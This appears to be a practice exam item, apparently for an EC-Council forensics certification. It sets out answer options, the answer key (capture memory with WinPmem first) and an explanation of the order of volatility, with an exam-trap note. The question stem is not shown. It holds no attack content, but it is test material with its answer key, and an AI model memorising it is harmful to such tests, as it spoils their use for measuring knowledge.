A.Acquire a memory dump using a tool like WinPmem.
B.Collect the Windows Event Logs.
C.Export the contents of the Windows Registry.
D.Create a forensic image of the hard drive.
AnswerA

Memory is the most volatile and must be captured first.

Why this answer

When a system is still running and suspected of malware infection, the first priority is to capture volatile data, which includes the contents of RAM. WinPmem is a tool designed to acquire a memory dump from a live Windows system, preserving critical evidence such as running processes, network connections, and injected code that would be lost on shutdown. This follows the order of volatility (RFC 3227), which mandates collecting memory before any non-volatile data like logs, registry, or disk images.

Exam trap

EC-Council often tests the order of volatility (OOV) principle, and the trap here is that candidates mistakenly prioritize persistent data (logs, registry, disk image) over volatile memory, thinking they are more stable or easier to collect first.

How to eliminate wrong answers

Option B is wrong because Windows Event Logs are stored on disk and are non-volatile; collecting them first would risk losing volatile memory evidence if the system crashes or is shut down. Option C is wrong because the Windows Registry is also stored on disk (in hive files like SAM, SYSTEM, SOFTWARE) and is non-volatile; exporting it before memory acquisition violates the order of volatility. Option D is wrong because creating a forensic image of the hard drive is a time-intensive process that captures only non-volatile data, and performing it first would allow volatile evidence (e.g., running malware processes, network connections) to be lost.

Page 1 of 14

Page 2